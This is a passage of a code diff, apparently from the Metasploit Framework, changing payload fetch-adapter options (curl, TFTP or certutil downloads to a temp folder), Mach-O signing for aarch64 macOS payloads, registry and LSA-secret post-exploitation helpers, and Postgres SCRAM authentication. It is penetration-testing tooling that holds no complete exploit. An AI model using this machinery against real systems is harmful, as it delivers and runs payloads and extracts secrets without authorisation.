+    # If the session is valid, register it with the framework and
+    # notify any waiters we may have.
+    if s
+      register_session(s)
+    end
+
+    return s
+  end
+
+protected
+
+  attr_accessor :conn_threads # :nodoc:
+  attr_accessor :listener_threads # :nodoc:
+  attr_accessor :listener_pairs # :nodoc:
+
+
+  module AwsInstanceConnectSessionChannelExt
+    attr_accessor :localinfo
+    attr_accessor :peerinfo
+  end
+
+end
+end
+end
@@ -160,6 +160,7 @@ module BindAwsSsm
    register_advanced_options(
      [
        OptString.new('SSM_SESSION_DOC', [true, 'The SSM document to use for session requests', 'SSM-SessionManagerRunShell']),
+        # AWS-RunShellScript, AWS-RunPowerShellScript, etc
        OptBool.new('SSM_KEEP_ALIVE', [false, 'Keep AWS SSM session alive with empty messages', true])
      ], Msf::Handler::BindAwsSsm)

@@ -28,7 +28,10 @@ class OptAddressLocal < OptAddress
      end
    end

-    addrs.any? ? addrs.first : ''
+    # Sort for deterministic normalization; preference ipv4 addresses followed by their value
+    sorted_addrs = addrs.sort_by { |addr| ip_addr = IPAddr.new(addr); [ip_addr.ipv4? ? 0 : 1, ip_addr.to_i] }
+
+    sorted_addrs.any? ? sorted_addrs.first : ''
  end

  def valid?(value, check_empty: true)
@@ -7,7 +7,7 @@ module Msf::Payload::Adapter::Fetch
        Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces.', Rex::Text.rand_text_alpha(rand(8..12))], regex:/^[\S]*$/),
        Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
-        Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ true, 'Local IP to use for serving payload']),
+        Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ false, 'Local IP to use for serving payload']),
        Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', ''], regex:/^[\S]*$/)
      ]
@@ -78,6 +78,8 @@ module Msf::Payload::Adapter::Fetch
  end

  def generate(opts = {})
+    datastore['FETCH_SRVHOST'] = datastore['LHOST'] if datastore['FETCH_SRVHOST'].blank?
+    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_SRVHOST required') if datastore['FETCH_SRVHOST'].blank?
    opts[:arch] ||= module_info['AdaptedArch']
    opts[:code] = super
    @srvexe = generate_payload_exe(opts)
@@ -1,12 +1,12 @@
 module Msf::Payload::Adapter::Fetch::WindowsOptions

  def initialize(info = {})
-    super(update_info(info,
-                      'DefaultOptions' => { 'FETCH_WRITABLE_DIR' => '%TEMP%' }
-          ))
+    super
+    deregister_options('FETCH_WRITABLE_DIR')
    register_options(
      [
-        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w{ CURL TFTP CERTUTIL }])
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w{ CURL TFTP CERTUTIL }]),
+        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', '%TEMP%'], regex:/^[\S]*$/)
      ]
    )
  end
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'macho'
+require 'digest'

 class Msf::Payload::MachO

@@ -53,6 +54,36 @@ class Msf::Payload::MachO
    raw_data
  end

+  # See: https://github.com/apple-oss-distributions/libsecurity_codesigning/blob/main/lib/signer.cpp#L179
+  # See: https://github.com/indygreg/apple-platform-rs/blob/main/apple-codesign/src/code_directory.rs
+  # See: https://developer.apple.com/forums/thread/702351
+  # See: https://github.com/apple-oss-distributions/Security/blob/e4ea024c9bbd3bfda30ec6df270bfb4c7438d1a9/SecurityTool/sharedTool/codesign.c#L323
+  def sign
+    raw_data = @macho.serialize
+    code_signature_index = @macho[:LC_CODE_SIGNATURE][0].dataoff
+    code_signature = raw_data[code_signature_index..]
+    s_magic, s_length, s_count, code_indexes = code_signature.unpack("N3a*")
+    raise "Invalid kSecCodeMagicEmbeddedSignature magic for macho" if s_magic != 0xfade0cc0
+    indexes = code_indexes.unpack("N#{s_count*2}a*")
+    code_directory = indexes.pop
+    magic, length, version, flags, hash_offset, ident_offset, n_special_slots, n_code_slots, code_limit, hash_size, hash_type, platform, page_size, spare2, hash_list = code_directory.unpack("N9C4Na*")
+    raise "Invalid kSecCodeMagicCodeDirectory magic for macho" if magic != 0xfade0c02
+    pagesize = 2**page_size
+    page_index = 0
+    raw_data.bytes.each_slice(pagesize) do |page|
+      break if page_index >= (length-hash_offset)/(hash_size)
+      if (page_index+1)*pagesize > code_signature_index
+        page = page[0..(pagesize-((page_index+1)*pagesize-code_signature_index))-1]
+      end
+      new_digest = Digest::SHA256.digest(page.pack("C*"))
+      old_digest_index = code_signature.index(code_directory[hash_offset+(hash_size*page_index)...])
+      code_signature[old_digest_index..old_digest_index+hash_size-1] = new_digest
+      page_index += 1
+    end
+    raw_data[code_signature_index..] = code_signature
+    raw_data
+  end
+
  def raw
    @macho.serialize
  end
@@ -353,13 +353,13 @@ class PayloadSet < ModuleSet
    case cached_module_metadata.payload_type
    when Payload::Type::Single
      single_name = cached_module_metadata.ref_name
-      single_info = _singles[single_name]
+      single_info = load_payload_component(Payload::Type::Single, single_name)
      calculate_single_payload(single_name: single_name, single_info: single_info)
    when Payload::Type::Stager
      stager_refname = cached_module_metadata.stager_refname
-      stager_info = _stagers[stager_refname]
+      stager_info = load_payload_component(Payload::Type::Stager, stager_refname)
      stage_name = cached_module_metadata.stage_refname
-      stage_info = _stages[stage_name]
+      stage_info = load_payload_component(Payload::Type::Stage, stage_name)

      calculate_staged_payload(stage_name: stage_name,
                               stager_name: stager_refname,
@@ -368,14 +368,15 @@ class PayloadSet < ModuleSet

    when Payload::Type::Adapter
      adapter_name = cached_module_metadata.adapter_refname
-      adapter_info = _adapters[adapter_name]
+      adapter_info = load_payload_component(Payload::Type::Adapter, adapter_name)

      if cached_module_metadata.staged
        stage_name = cached_module_metadata.stage_refname

-        stage_info = _stages[stage_name]
+        stage_info = load_payload_component(Payload::Type::Stage, stage_name)
        stager_name= cached_module_metadata.stager_refname
-        stager_info = _stagers[stager_name]
+        stager_info = load_payload_component(Payload::Type::Stager, stager_name)
+
        staged_payload = self[cached_module_metadata.adapted_refname]

        calculate_adapted_staged_payload(staged_payload: staged_payload,
@@ -385,7 +386,7 @@ class PayloadSet < ModuleSet
                                         adapter_info: adapter_info)
      else
        single_name = cached_module_metadata.adapted_refname
-        single_info = _singles[single_name]
+        single_info = load_payload_component(Payload::Type::Single, single_name)
        single_payload = self[single_name]
        calculate_adapted_single_payload(adapter_name: adapter_name,
                                         adapter_info: adapter_info,
@@ -393,6 +394,34 @@ class PayloadSet < ModuleSet
                                         single_payload: single_payload)
      end
    end
+  rescue ::Msf::MissingPayloadError => e
+    elog("Missing payload component for #{cached_module_metadata.ref_name}", error: e)
+    return nil
+  rescue StandardError => e
+    elog("#{cached_module_metadata.ref_name} failed to load", error: e)
+    return nil
+  end
+
+  def load_payload_component(payload_type, refname)
+    payload_type_cache, folder_name = case payload_type
+                                      when Payload::Type::Single
+                                        [_singles, 'singles']
+                                      when Payload::Type::Stage
+                                        [_stages, 'stages']
+                                      when Payload::Type::Stager
+                                        [_stagers, 'stagers']
+                                      when Payload::Type::Adapter
+                                        [_adapters, 'adapters']
+                                      else
+                                        raise ArgumentError("Invalid payload type: #{payload_type}")
+                                      end
+
+    payload_component_info = payload_type_cache[refname]
+    unless payload_component_info
+      raise Msf::MissingPayloadError, "#{refname} is not available"
+    end
+
+    payload_component_info
  end

  #
@@ -1104,7 +1104,7 @@ protected
    token = "_#{::Rex::Text.rand_text_alpha(32)}"
    result = session.shell_command_token("#{cmd} && echo #{token}")

-    return result.include?(token)
+    return result&.include?(token)
  end

  #
@@ -1,6 +1,5 @@
 # -*- coding: binary -*-

-
 module Msf
 class Post
 module Windows
@@ -103,7 +102,7 @@ module Registry
  # Load a hive file
  #
  def registry_loadkey(key, file)
-    if session_has_registry_ext
+    if session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY)
      meterpreter_registry_loadkey(key, file)
    else
      shell_registry_loadkey(key, file)
@@ -114,7 +113,7 @@ module Registry
  # Unload a hive file
  #
  def registry_unloadkey(key)
-    if session_has_registry_ext
+    if session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY)
      meterpreter_registry_unloadkey(key)
    else
      shell_registry_unloadkey(key)
@@ -125,7 +124,7 @@ module Registry
  # Create the given registry key
  #
  def registry_createkey(key, view = REGISTRY_VIEW_NATIVE)
-    if session_has_registry_ext
+    if session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY)
      meterpreter_registry_createkey(key, view)
    else
      shell_registry_createkey(key, view)
@@ -138,7 +137,7 @@ module Registry
  # returns true if succesful
  #
  def registry_deleteval(key, valname, view = REGISTRY_VIEW_NATIVE)
-    if session_has_registry_ext
+    if session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY)
      meterpreter_registry_deleteval(key, valname, view)
    else
      shell_registry_deleteval(key, valname, view)
@@ -151,7 +150,7 @@ module Registry
  # returns true if succesful
  #
  def registry_deletekey(key, view = REGISTRY_VIEW_NATIVE)
-    if session_has_registry_ext
+    if session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY)
      meterpreter_registry_deletekey(key, view)
    else
      shell_registry_deletekey(key, view)
@@ -162,7 +161,7 @@ module Registry
  # Return an array of subkeys for the given registry key
  #
  def registry_enumkeys(key, view = REGISTRY_VIEW_NATIVE)
-    if session_has_registry_ext
+    if session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY)
      meterpreter_registry_enumkeys(key, view)
    else
      shell_registry_enumkeys(key, view)
@@ -173,7 +172,7 @@ module Registry
  # Return an array of value names for the given registry key
  #
  def registry_enumvals(key, view = REGISTRY_VIEW_NATIVE)
-    if session_has_registry_ext
+    if session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT)
      meterpreter_registry_enumvals(key, view)
    else
      shell_registry_enumvals(key, view)
@@ -184,7 +183,7 @@ module Registry
  # Return the data of a given registry key and value
  #
  def registry_getvaldata(key, valname, view = REGISTRY_VIEW_NATIVE)
-    if session_has_registry_ext
+    if session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT)
      meterpreter_registry_getvaldata(key, valname, view)
    else
      shell_registry_getvaldata(key, valname, view)
@@ -195,7 +194,7 @@ module Registry
  # Return the data and type of a given registry key and value
  #
  def registry_getvalinfo(key, valname, view = REGISTRY_VIEW_NATIVE)
-    if session_has_registry_ext
+    if session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY)
      meterpreter_registry_getvalinfo(key, valname, view)
    else
      shell_registry_getvalinfo(key, valname, view)
@@ -208,7 +207,7 @@ module Registry
  # returns true if succesful
  #
  def registry_setvaldata(key, valname, data, type, view = REGISTRY_VIEW_NATIVE)
-    if session_has_registry_ext
+    if session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT)
      meterpreter_registry_setvaldata(key, valname, data, type, view)
    else
      shell_registry_setvaldata(key, valname, data, type, view)
@@ -221,7 +220,7 @@ module Registry
  # @return [Boolean] true if the key exists on the target registry, false otherwise
  #   (also in case of error)
  def registry_key_exist?(key)
-    if session_has_registry_ext
+    if session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS)
      meterpreter_registry_key_exist?(key)
    else
      shell_registry_key_exist?(key)
@@ -233,6 +232,7 @@ protected
  #
  # Determines whether the session can use meterpreter registry methods
  #
+  # @deprecated Use granular command ID checking session.commands instead
  def session_has_registry_ext
    begin
      return !!(session.sys and session.sys.registry)
@@ -253,7 +253,8 @@ protected
    elsif view == REGISTRY_VIEW_64_BIT
      cmd << " /reg:64"
    end
-    cmd_exec(cmd)
+    result = cmd_exec(cmd)
+    result
  end

  def shell_registry_cmd_result(suffix, view = REGISTRY_VIEW_NATIVE)
@@ -228,7 +228,9 @@ module Msf
        # @todo Rewrite to allow operating on a remote host
        #
        def service_list
-          return meterpreter_service_list if session.type == 'meterpreter'
+          if session.type == 'meterpreter' && session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY)
+            return meterpreter_service_list
+          end

          services = []
          each_service do |s|
@@ -19,6 +19,12 @@ class Msf::Ui::Console::CommandDispatcher::Developer
    ['-l', '--list'] => [false, 'View the currently running services' ]
  )

+  @@_historymanager_opts = Rex::Parser::Arguments.new(
+    '-h' => [false, 'Help menu.'             ],
+    ['-l', '--list'] => [true,  'View the current history manager contexts.'],
+    ['-d', '--debug'] => [true,  'Debug the current history manager contexts.']
+  )
+
  def initialize(driver)
    super
    @modified_files = modified_file_paths(print_errors: false)
@@ -37,8 +43,9 @@ class Msf::Ui::Console::CommandDispatcher::Developer
      'log'        => 'Display framework.log paged to the end if possible',
      'time'       => 'Time how long it takes to run a particular command'
    }
-    if framework.features.enabled?(Msf::FeatureManager::SERVICEMANAGER_COMMAND)
+    if framework.features.enabled?(Msf::FeatureManager::MANAGER_COMMANDS)
      commands['_servicemanager'] = 'Interact with the Rex::ServiceManager'
+      commands['_historymanager'] = 'Interact with the Rex::Ui::Text::Shell::HistoryManager'
    end
    commands
  end
@@ -122,7 +129,7 @@ class Msf::Ui::Console::CommandDispatcher::Developer
    if expressions.empty?
      print_status('Starting IRB shell...')

-      Rex::Ui::Text::Shell::HistoryManager.with_context(name: :irb) do
+      Rex::Ui::Text::Shell::HistoryManager.instance.with_context(name: :irb) do
        begin
          if active_module
            print_status("You are in #{active_module.fullname}\n")
@@ -185,7 +192,7 @@ class Msf::Ui::Console::CommandDispatcher::Developer
    print_status('Starting Pry shell...')

    Pry.config.history_load = false
-    Rex::Ui::Text::Shell::HistoryManager.with_context(history_file: Msf::Config.pry_history, name: :pry) do
+    Rex::Ui::Text::Shell::HistoryManager.instance.with_context(history_file: Msf::Config.pry_history, name: :pry) do
      if active_module
        print_status("You are in the \"#{active_module.fullname}\" module object\n")
        active_module.pry
@@ -382,13 +389,76 @@ class Msf::Ui::Console::CommandDispatcher::Developer
  end

  def cmd__servicemanager_help
-    print_line 'Usage: servicemanager'
+    print_line 'Usage: _servicemanager'
    print_line
    print_line 'Manage running framework services'
    print @@_servicemanager_opts.usage
    print_line
  end

+  #
+  # Interact with framework's history manager
+  #
+  def cmd__historymanager(*args)
+    if args.include?('-h') || args.include?('--help')
+      cmd__historymanager_help
+      return false
+    end
+
+    opts = {}
+    @@_historymanager_opts.parse(args) do |opt, idx, val|
+      case opt
+      when '-l', '--list'
+        opts[:list] = true
+      when '-d', '--debug'
+        opts[:debug] = val.nil? ? true : val.downcase.start_with?(/t|y/)
+      end
+    end
+
+    if opts.empty?
+      opts[:list] = true
+    end
+
+    if opts.key?(:debug)
+      Rex::Ui::Text::Shell::HistoryManager.instance._debug = opts[:debug]
+      print_status("HistoryManager debugging is now #{opts[:debug] ? 'on' : 'off'}")
+    end
+
+    if opts[:list]
+      table = Rex::Text::Table.new(
+        'Header'  => 'History contexts',
+        'Indent'  => 1,
+        'Columns' => ['Id', 'File', 'Name']
+      )
+      Rex::Ui::Text::Shell::HistoryManager.instance._contexts.each.with_index do |context, id|
+        table << [id, context[:history_file], context[:name]]
+      end
+
+      if table.rows.empty?
+        print_status("No history contexts present.")
+      else
+        print_line(table.to_s)
+      end
+    end
+  end
+
+  #
+  # Tab completion for the _historymanager command
+  #
+  def cmd__historymanager_tabs(_str, words)
+    return [] if words.length > 1
+
+    @@_historymanager_opts.option_keys
+  end
+
+  def cmd__historymanager_help
+    print_line 'Usage: _historymanager'
+    print_line
+    print_line 'Manage the history manager'
+    print @@_historymanager_opts.usage
+    print_line
+  end
+
  #
  # Time how long in seconds a command takes to execute
  #
@@ -1434,14 +1434,30 @@ module Msf
              return
            end

-            # create module set using the saved modules
-            fav_modules = {}
-            saved_favs = File.readlines(favs_file)
-            saved_favs.each do |mod|
-              module_name = mod.strip
-              fav_modules[module_name] = framework.modules[module_name]
+            # get the full module names from the favorites file and use then to search the MetaData Cache for matching modules
+            saved_favs = File.readlines(favs_file).map(&:strip)
+            @module_search_results = Msf::Modules::Metadata::Cache.instance.find('fullname' => [saved_favs, []])
+
+            count = -1
+            tbl = generate_module_table('Favorite Modules')
+
+            @module_search_results.each do |m|
+              tbl << [
+                  count += 1,
+                  m.fullname,
+                  m.disclosure_date.nil? ? '' : m.disclosure_date.strftime("%Y-%m-%d"),
+                  m.rank,
+                  m.check ? 'Yes' : 'No',
+                  m.name,
+              ]
            end
-            show_module_metadata('Favorites', fav_modules)
+
+            print_line(tbl.to_s)
+            index_usage = "use #{@module_search_results.length - 1}"
+            index_info = "info #{@module_search_results.length - 1}"
+            name_usage = "use #{@module_search_results.last.fullname}"
+
+            print("Interact with a module by name or index. For example %grn#{index_info}%clr, %grn#{index_usage}%clr or %grn#{name_usage}%clr\n\n")
          end

          def show_missing(mod) # :nodoc:
@@ -167,6 +167,10 @@ require 'digest/sha1'
        return to_linux_aarch64_elf(framework, code)
      end

+      if plat.index(Msf::Module::Platform::OSX)
+        return to_osx_aarch64_macho(framework, code)
+      end
+
      # XXX: Add remaining AARCH64 systems here
    end

@@ -867,6 +871,25 @@ require 'digest/sha1'
    mo
  end

+  # self.to_osx_aarch64_macho
+  #
+  # @param framework  [Msf::Framework]  The framework of you want to use
+  # @param code       [String]
+  # @param opts       [Hash]
+  # @option           [String] :template
+  # @return           [String]
+  def self.to_osx_aarch64_macho(framework, code, opts = {})
+
+    # Allow the user to specify their own template
+    set_template_default(opts, "template_aarch64_darwin.bin")
+
+    mo = self.get_file_contents(opts[:template])
+    bo = self.find_payload_tag(mo, "Invalid OSX Aarch64 Mach-O template: missing \"PAYLOAD:\" tag")
+    mo[bo, code.length] = code
+    Payload::MachO.new(mo).sign
+    mo
+  end
+
  # self.to_osx_ppc_macho
  #
  # @param framework  [Msf::Framework]  The framework of you want to use
@@ -2138,6 +2161,8 @@ require 'digest/sha1'
          to_osx_arm_macho(framework, code, exeopts)
        when ARCH_PPC
          to_osx_ppc_macho(framework, code, exeopts)
+        when ARCH_AARCH64
+          to_osx_aarch64_macho(framework, code, exeopts)
        end
      end
      fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho
@@ -426,4 +426,3 @@ module WindowsCryptoHelpers
 end
 end
 end
-
@@ -332,7 +332,7 @@ module WindowsRegistry
          return hash_rec.offset_nk
        end
      when LH_MAGIC
-        if hash_rec.key_name.unpack('<L').first == get_lh_hash(key)
+        if hash_rec.key_name.unpack('L<').first == get_lh_hash(key)
          return hash_rec.offset_nk
        end
      when RI_MAGIC
@@ -368,7 +368,7 @@ module WindowsRegistry
      value_list = []
      res = []
      count.times do |i|
-        value_list << @hive_data[4096+offset+i*4, 4].unpack('<l').first
+        value_list << @hive_data[4096+offset+i*4, 4].unpack('l<').first
      end
      value_list.each do |value_offset|
        if value_offset > 0
@@ -141,10 +141,10 @@ module WindowsRegistry

        if @lsa_vista_style
          decrypted = decrypt_lsa_data(encrypted_secret, lsa_key)
-          secret_size = decrypted[0, 4].unpack('<L').first
+          secret_size = decrypted[0, 4].unpack('L<').first
          secret = decrypted[16, secret_size]
        else
-          encrypted_secret_size = encrypted_secret[0, 4].unpack('<L').first
+          encrypted_secret_size = encrypted_secret[0, 4].unpack('L<').first
          secret = decrypt_secret_data(encrypted_secret[(encrypted_secret.size - encrypted_secret_size)..-1], lsa_key)
        end
        lsa_secrets[key] = secret
@@ -164,7 +164,7 @@ module WindowsRegistry
      if @lsa_vista_style
        nlkm_dec = decrypt_lsa_data(value_data, lsa_key)
      else
-        value_data_size = value_data[0, 4].unpack('<L').first
+        value_data_size = value_data[0, 4].unpack('L<').first
        nlkm_dec = decrypt_secret_data(value_data[(value_data.size - value_data_size)..-1], lsa_key)
      end

@@ -170,6 +170,7 @@ class MsfAutoload
      'pe_inject' => 'PEInject',
      'payload_db_conf' => 'PayloadDBConf',
      'reverse_tcp_x86' => 'ReverseTcp_x86',
+      'reverse_tcp_aarch64' => 'ReverseTcp_Aarch64',
      'ruby_dl' => 'RubyDL',
      'wmic' => 'WMIC',
      'net_api' => 'NetAPI',
@@ -247,6 +248,7 @@ class MsfAutoload
      'meterpreter_mipsbe_linux' => 'Meterpreter_mipsbe_Linux',
      'meterpreter_aarch64_apple_ios' => 'Meterpreter_aarch64_Apple_iOS',
      'meterpreter_x64_osx' => 'Meterpreter_x64_OSX',
+      'meterpreter_aarch64_osx' => 'Meterpreter_aarch64_OSX',
      'meterpreter_ppc_linux' => 'Meterpreter_ppc_Linux',
      'meterpreter_x64_win' => 'Meterpreter_x64_Win',
      'meterpreter_php' => 'Meterpreter_Php_Php',
@@ -11,7 +11,7 @@ module Db
 class Buffer

  class Error < RuntimeError; end
-  class EOF < Error; end 
+  class EOF < Error; end

  def self.from_string(str)
    new(str)
@@ -20,7 +20,7 @@ class Buffer
  def self.of_size(size)
    raise ArgumentError if size < 0
    new('#' * size)
-  end 
+  end

  def initialize(content)
    @size = content.size
@@ -36,6 +36,10 @@ class Buffer
    @position
  end

+  def peek
+    @content[@position]
+  end
+
  def position=(new_pos)
    raise ArgumentError if new_pos < 0 or new_pos > @size
    @position = new_pos
@@ -67,11 +71,11 @@ class Buffer
  def copy_from_stream(stream, n)
    raise ArgumentError if n < 0
    while n > 0
-      str = stream.read(n) 
+      str = stream.read(n)
      write(str)
      n -= str.size
    end
-    raise if n < 0 
+    raise if n < 0
  end

  NUL = "\000"
@@ -8,6 +8,7 @@
 require 'postgres_msf'
 require 'postgres/postgres-pr/message'
 require 'postgres/postgres-pr/version'
+require 'postgres/postgres-pr/scram_sha_256'
 require 'uri'
 require 'rex/socket'

@@ -65,7 +66,7 @@ class Connection
    # Check if the password supplied is a Postgres-style md5 hash
    md5_hash_match = password.match(/^md5([a-f0-9]{32})$/)

-    @conn << StartupMessage.new(PROTO_VERSION, 'user' => user, 'database' => database).dump
+    write_message(StartupMessage.new(PROTO_VERSION, 'user' => user, 'database' => database))

    loop do
      msg = Message.read(@conn)
@@ -74,11 +75,11 @@ class Connection
      when AuthentificationClearTextPassword
        raise ArgumentError, "no password specified" if password.nil?
        raise AuthenticationMethodMismatch, "Server expected clear text password auth" if md5_hash_match
-        @conn << PasswordMessage.new(password).dump
+        write_message(PasswordMessage.new(password))
      when AuthentificationCryptPassword
        raise ArgumentError, "no password specified" if password.nil?
        raise AuthenticationMethodMismatch, "Server expected crypt password auth" if md5_hash_match
-        @conn << PasswordMessage.new(password.crypt(msg.salt)).dump
+        write_message(PasswordMessage.new(password.crypt(msg.salt)))
      when AuthentificationMD5Password
        raise ArgumentError, "no password specified" if password.nil?
        require 'digest/md5'
@@ -91,8 +92,10 @@ class Connection
        m = Digest::MD5.hexdigest(m + msg.salt)
        m = 'md5' + m

-        @conn << PasswordMessage.new(m).dump
+        write_message(PasswordMessage.new(m))

+      when AuthenticationSASL
+        negotiate_sasl(msg, user, password)
      when UnknownAuthType
        raise "unknown auth type '#{msg.auth_type}' with buffer content:\n#{Rex::Text.to_hex_dump(msg.buffer.content)}"

@@ -101,7 +104,7 @@ class Connection

      when AuthentificationOk
      when ErrorResponse
-        raise msg.field_values.join("\t")
+        handle_server_error_message(msg)
      when NoticeResponse
        @notice_processor.call(msg) if @notice_processor
      when ParameterStatus
@@ -124,7 +127,7 @@ class Connection
    @conn = nil
  end

-  class Result 
+  class Result
    attr_accessor :rows, :fields, :cmd_tag
    def initialize(rows=[], fields=[])
      @rows, @fields = rows, fields
@@ -132,7 +135,7 @@ class Connection
  end

  def query(sql)
-    @conn << Query.dump(sql)
+    write_message(Query.new(sql))

    result = Result.new
    errors = []
@@ -167,18 +170,69 @@ class Connection
    result
  end

+
+  # @param [AuthenticationSASL] msg
+  # @param [String] user
+  # @param [String,nil] password
+  def negotiate_sasl(msg, user, password = nil)
+    if msg.mechanisms.include?('SCRAM-SHA-256')
+      scram_sha_256 = ScramSha256.new
+      # Start negotiating scram, additionally wrapping in SASL and unwrapping the SASL responses
+      scram_sha_256.negotiate(user, password) do |state, value|
+        if state == :client_first
+          sasl_initial_response_message = SaslInitialResponseMessage.new(
+            mechanism: 'SCRAM-SHA-256',
+            value: value
+          )
+
+          write_message(sasl_initial_response_message)
+
+          sasl_continue = Message.read(@conn)
+          raise handle_server_error_message(sasl_continue) if sasl_continue.is_a?(ErrorResponse)
+          raise AuthenticationMethodMismatch, "Did not receive AuthenticationSASLContinue - instead got #{sasl_continue}" unless sasl_continue.is_a?(AuthenticationSASLContinue)
+
+          server_first_string = sasl_continue.value
+          server_first_string
+        elsif state == :client_final
+          sasl_initial_response_message = SASLResponseMessage.new(
+            value: value
+          )
+
+          write_message(sasl_initial_response_message)
+
+          server_final = Message.read(@conn)
+          raise handle_server_error_message(server_final) if server_final.is_a?(ErrorResponse)
+          raise AuthenticationMethodMismatch, "Did not receive AuthenticationSASLFinal - instead got #{server_final}" unless server_final.is_a?(AuthenticationSASLFinal)
+
+          server_final_string = server_final.value
+          server_final_string
+        else
+          raise AuthenticationMethodMismatch, "Unexpected negotiation state #{state}"
+        end
+      end
+    else
+      raise AuthenticationMethodMismatch, "unsupported SASL mechanisms #{msg.mechanisms.inspect}"
+    end
+  end
+
  DEFAULT_PORT = 5432
  DEFAULT_HOST = 'localhost'
-  DEFAULT_PATH = '/tmp' 
-  DEFAULT_URI = 
+  DEFAULT_PATH = '/tmp'
+  DEFAULT_URI =
    if RUBY_PLATFORM.include?('win')
-      'tcp://' + DEFAULT_HOST + ':' + DEFAULT_PORT.to_s 
+      'tcp://' + DEFAULT_HOST + ':' + DEFAULT_PORT.to_s
    else
-      'unix:' + File.join(DEFAULT_PATH, '.s.PGSQL.' + DEFAULT_PORT.to_s)  
+      'unix:' + File.join(DEFAULT_PATH, '.s.PGSQL.' + DEFAULT_PORT.to_s)
    end

  private

+  # @param [ErrorResponse] server_error_message
+  # @raise [RuntimeError]
+  def handle_server_error_message(server_error_message)
+    raise server_error_message.field_values.join("\t")
+  end
+
  # tcp://localhost:5432
  # unix:/tmp/.s.PGSQL.5432
  def establish_connection(uri)
@@ -196,6 +250,12 @@ class Connection
      raise 'unrecognized uri scheme format (must be tcp or unix)'
    end
  end
+
+  # @param [Message] message
+  # @return [Numeric] The byte count successfully written to the currently open connection
+  def write_message(message)
+    @conn << message.dump
+  end
 end

 end # module PostgresPR
@@ -3,7 +3,7 @@
 # Author:: Michael Neumann
 # Copyright:: (c) 2005 by Michael Neumann
 # License:: Same as Ruby's or BSD
-# 
+#

 require 'postgres_msf'
 require 'postgres/buffer'
@@ -38,7 +38,7 @@ class Message

    MsgTypeMap[type] = self

-    self.const_set(:MsgType, type) 
+    self.const_set(:MsgType, type)
    class_eval "def message_type; MsgType end"
  end

@@ -60,7 +60,7 @@ class Message
    buffer.write(type) unless startup
    buffer.write_int32_network(length)
    buffer.copy_from_stream(stream, length-4)
-    
+
    (startup ? StartupMessage : MsgTypeMap[type]).create(buffer)
  end

@@ -95,11 +95,11 @@ class Message
    ivar_list = names.map {|name| "@" + name }.join(", ")
    sym_list = names.map {|name| ":" + name }.join(", ")
    class_eval %[
-      attr_accessor #{ sym_list } 
+      attr_accessor #{ sym_list }
      def initialize(#{ arg_list })
        #{ ivar_list } = #{ arg_list }
      end
-    ] 
+    ]
  end
 end

@@ -130,7 +130,7 @@ class Authentification < Message
  def self.register_auth_type(type)
    raise "duplicate auth type registration" if AuthTypeMap.has_key?(type)
    AuthTypeMap[type] = self
-    self.const_set(:AuthType, type) 
+    self.const_set(:AuthType, type)
    class_eval "def auth_type() AuthType end"
  end

@@ -145,7 +145,7 @@ class Authentification < Message

  def parse(buffer)
    super do
-      auth_t = buffer.read_int32_network 
+      auth_t = buffer.read_int32_network
      raise ParseError unless auth_t == self.auth_type
      yield if block_given?
    end
@@ -162,19 +162,19 @@ class UnknownAuthType < Authentification
  end
 end

-class AuthentificationOk < Authentification 
+class AuthentificationOk < Authentification
  register_auth_type 0
 end

-class AuthentificationKerberosV4 < Authentification 
+class AuthentificationKerberosV4 < Authentification
  register_auth_type 1
 end

-class AuthentificationKerberosV5 < Authentification 
+class AuthentificationKerberosV5 < Authentification
  register_auth_type 2
 end

-class AuthentificationClearTextPassword < Authentification 
+class AuthentificationClearTextPassword < Authentification
  register_auth_type 3
 end

@@ -201,25 +201,134 @@ module SaltedAuthentificationMixin
  end
 end

-class AuthentificationCryptPassword < Authentification 
+class AuthentificationCryptPassword < Authentification
  register_auth_type 4
  include SaltedAuthentificationMixin
  def salt_size; 2 end
 end


-class AuthentificationMD5Password < Authentification 
+class AuthentificationMD5Password < Authentification
  register_auth_type 5
  include SaltedAuthentificationMixin
  def salt_size; 4 end
 end

-class AuthentificationSCMCredential < Authentification 
+class AuthentificationSCMCredential < Authentification
  register_auth_type 6
 end

-class PasswordMessage < Message
+# SASL Overview
